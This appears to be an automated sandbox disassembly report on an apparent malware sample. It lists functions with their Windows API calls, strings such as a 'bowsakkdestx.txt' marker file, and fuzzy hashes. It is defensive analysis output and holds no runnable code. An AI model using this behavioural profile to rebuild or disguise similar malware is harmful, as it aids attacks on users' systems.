                • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                APIs
                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                • DispatchMessageW.USER32(?), ref: 0041FE2B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\buffer\buffer.c$C7F
                • API String ID: 2102423945-2013712220
                • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                APIs
                Strings
                • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: StringUuid$CreateFree
                • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                • API String ID: 3044360575-2335240114
                • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 29327785-2616962270
                • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                APIs
                • _malloc.LIBCMT ref: 00423B64
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: HeapAlloc.KERNEL32(005C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • std::exception::exception.LIBCMT ref: 00423B82
                • __CxxThrowException@8.LIBCMT ref: 00423B97
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                • String ID: bad allocation
                • API String ID: 1059622496-2104205924
                • Opcode ID: eeb942be7a8daecd01f402b1fc71538ff316d088b395842a07765e87b7e27695
                • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                • Opcode Fuzzy Hash: eeb942be7a8daecd01f402b1fc71538ff316d088b395842a07765e87b7e27695
                • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                APIs
                • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                • RegisterClassExW.USER32(00000030), ref: 0041BA73
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: ClassCursorLoadRegister
                • String ID: 0$LPCWSTRszWindowClass
                • API String ID: 1693014935-1496217519
                • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                • DeleteFileA.KERNEL32(?), ref: 0040C45B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendDeleteFileFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 610490371-2616962270
                • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memmove_strtok
                • String ID:
                • API String ID: 3446180046-0
                • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                • __isleadbyte_l.LIBCMT ref: 0043C6DB
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateHandleWritelstrlen
                • String ID:
                • API String ID: 1421093161-0
                • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                APIs
                • ___BuildCatchObject.LIBCMT ref: 004C70AB
                  • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                  • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                • CallCatchBlock.LIBCMT ref: 004C70F8
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                APIs
                  • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                  • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                • __calloc_crt.LIBCMT ref: 00425A01
                  • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                • __lock.LIBCMT ref: 00425A37
                • ___addlocaleref.LIBCMT ref: 00425A43
                • __lock.LIBCMT ref: 00425A57
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                • String ID:
                • API String ID: 2580527540-0
                • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                APIs
                • lstrlenW.KERNEL32 ref: 004127B9
                • _malloc.LIBCMT ref: 004127C3
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: HeapAlloc.KERNEL32(005C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _memset.LIBCMT ref: 004127CE
                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                • String ID:
                • API String ID: 3705855051-0
                • Opcode ID: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                • Opcode Fuzzy Hash: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                APIs
                • lstrlenA.KERNEL32 ref: 00412806
                • _malloc.LIBCMT ref: 00412814
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: HeapAlloc.KERNEL32(005C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _memset.LIBCMT ref: 0041281F
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                • String ID:
                • API String ID: 3705855051-0
                • Opcode ID: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                • Opcode Fuzzy Hash: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\asn1\tasn_new.c
                • API String ID: 2102423945-2878120539
                • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2063565086.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2063565086.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_C0XWmZAnYk.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                  • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                  • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                  • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                  • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                  • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                  • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
